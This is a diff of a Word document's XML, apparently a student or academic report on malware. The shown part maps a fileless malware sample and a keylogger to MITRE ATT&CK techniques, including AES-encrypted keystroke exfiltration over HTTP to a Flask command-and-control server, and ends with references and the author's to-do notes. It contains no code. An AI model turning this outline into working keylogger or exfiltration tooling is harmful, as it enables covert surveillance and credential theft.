+              <w:t>Exfiltration</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Exfiltration Over Encrypted Channel (HTTP/AES)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1041 / T1048</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>AES-encrypted keystrokes sent to Flask server via HTTP</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Command and Control</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Application Layer Protocol: HTTP</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1071.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>C2 server listens and stores incoming keystroke data</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Conclusion on Mapping</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Both implementations align with ATT&amp;CK-mapped behavior observed in modern APT campaigns and commodity malware. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Fileless malware</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> matches the stealth tactics of groups like FIN7 and APT32, while the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>keylogger implementation</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> reflects tools used in espionage, surveillance, and credential theft. This validation confirms the authenticity and realism of the techniques demonstrated.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6442,7 +7719,7 @@
           <w:szCs w:val="34"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc194070989"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc194070989"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -6452,9 +7729,10 @@
           <w:sz w:val="34"/>
           <w:szCs w:val="34"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>6. Conclusion</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6479,7 +7757,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Among all five, </w:t>
       </w:r>
       <w:r>
@@ -6688,7 +7965,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc194070990"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc194070990"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -6698,9 +7975,10 @@
           <w:sz w:val="34"/>
           <w:szCs w:val="34"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>7. References</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="15"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -6848,7 +8126,6 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Bashir, M., &amp; Papadopoulos, P. (2023). HTTPS abuse in phishing: Trust indicators and user deception. </w:t>
       </w:r>
       <w:r>
@@ -7360,6 +8637,26 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="34"/>
+          <w:szCs w:val="34"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="34"/>
+          <w:szCs w:val="34"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">8.Appendix </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:sz w:val="22"/>
@@ -7372,101 +8669,42 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">No need to elaborate on implementation steps – </w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">Download all the 16 paper individually and extract more concrete data, comparative analysis and synthesis and deduction from each of the 3 papers for every malware type </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">because its </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>someone</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">Use the refined version for the evaluation and recommendation section </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> else’s work</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Just introduce the topic, analyse the result, and synthesis, </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Sandbox is just a simple network </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> finish up with the implementations.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -7476,6 +8714,56 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
@@ -15571,7 +16859,7 @@
     <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footer" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -16499,6 +17787,49 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HeaderChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002613AA"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Header"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="002613AA"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002613AA"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="002613AA"/>
+  </w:style>
 </w:styles>
 </file>
 
